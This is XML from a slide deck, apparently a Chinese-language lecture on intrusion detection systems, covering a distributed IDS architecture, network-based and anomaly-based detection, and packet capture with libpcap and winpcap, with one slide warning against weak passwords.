          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4500" y="4248"/>
              <a:ext cx="2340" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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管理构件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162825" name="Line 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249A1FED-D213-4BDC-B36D-2F90165308EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3960" y="3624"/>
              <a:ext cx="540" cy="6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6" name="Line 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C65D69-D314-4905-B03C-6413F39CFFDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6840" y="3624"/>
              <a:ext cx="540" cy="6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7" name="Line 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26991CF2-B391-4436-9F18-ECA12C279C62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3960" y="4872"/>
              <a:ext cx="540" cy="78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8" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D92CAB32-96FB-4E19-A95A-4AFD799C870C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6840" y="4872"/>
              <a:ext cx="720" cy="78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29" name="AutoShape 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E164599B-935D-4403-94AE-AD98F3D468BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4680" y="5496"/>
              <a:ext cx="1800" cy="780"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>安全知识库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162830" name="Line 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F5EF400-A0FD-42F5-93BB-A08F52921749}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3960" y="5964"/>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1" name="Line 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892BE343-238F-44DE-94FF-A9EE3ACC314B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6480" y="5964"/>
              <a:ext cx="9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2" name="Line 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6373EB3E-CB89-4F40-99F2-E87C5E56D0C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5580" y="4872"/>
              <a:ext cx="0" cy="624"/>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2833" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698D1E99-EFEC-493B-A1D3-C1751C2F6039}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="7056"/>
              <a:ext cx="522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800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>分布式入侵检测系统结构示意图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026D953F-C390-4B76-811C-C0002E42F214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于网络的入侵检测的好处</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163843" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E38BEA58-960F-49B3-8F6B-3F576F75F607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>威慑外部人员</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>自动响应及报告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>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A0330D08-E9FC-46A1-8570-F776569C9D71}"/>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D1A949D0-882C-4939-B591-C273127DFC27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="2017713"/>
            <a:ext cx="8704263" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>安全提示：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不要使用弱口令！！！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>      同时包括大小写字母、数字以及特殊符号！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210946" name="Picture 2" descr="点赞手势图片-点赞手势素材-包图网">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5775F10C-D7EA-47BB-B0C0-18194FE2A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21163"/>
            <a:ext cx="936625"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5715">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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2109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4866" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E689EB80-6A12-4438-935F-90BA01232192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于网络的技术面临的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164867" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94DF0343-6506-43B4-8E84-5615A3029AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>分组重组</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>高速网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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890" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE090C3-2AE4-4823-BFAF-4BFFA7A6FF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于异常的入侵检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165891" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4569D108-EC50-4A0C-9043-A494F6685FD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>思想：任何正常人的行为有一定的规律</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>需要考虑的问题：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>）选择哪些数据来表现用户的行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>）通过以上数据如何有效地表示用户的行为，主要在于学习和检测方法的不同</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>）考虑学习过程的时间长短、用户行为的时效性等问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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4" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC8FACEF-341E-4DF8-840C-79BCDD7A347A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据选取的原则</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166915" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4CD86F-05C2-4BA9-808F-8A17B565ADF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2286000"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>数据能充分反映用户行为特征的全貌</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="1"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>） 应使需要的数据量最小</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="1"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1"/>
              <a:t>） 数据提取难度不应太大</a:t>
            </a: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4D6F73A5-1644-4F2C-8A8A-A9EF6DFBFB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>抓包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167939" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FB594B-7848-4683-B612-DAA6D6C26A63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>PF_PACKET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>从链路层抓包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>libpcap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>winpcap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>下的抓包库</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08CB8E5B-C417-4AD8-A6F8-A2E2397B2846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分析数据包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168963" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680DCE88-E2C2-4471-BC08-88BF65EAAC16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="5629275"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ethernet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168964" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3AFEA0-E213-4E4A-8AE7-34D97D9FE863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="5172075"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168965" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F94F8C-7FDC-4DF3-9CC4-5A9D4C4B758B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="4714875"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168966" name="Text Box 6">
            <a:extLst>
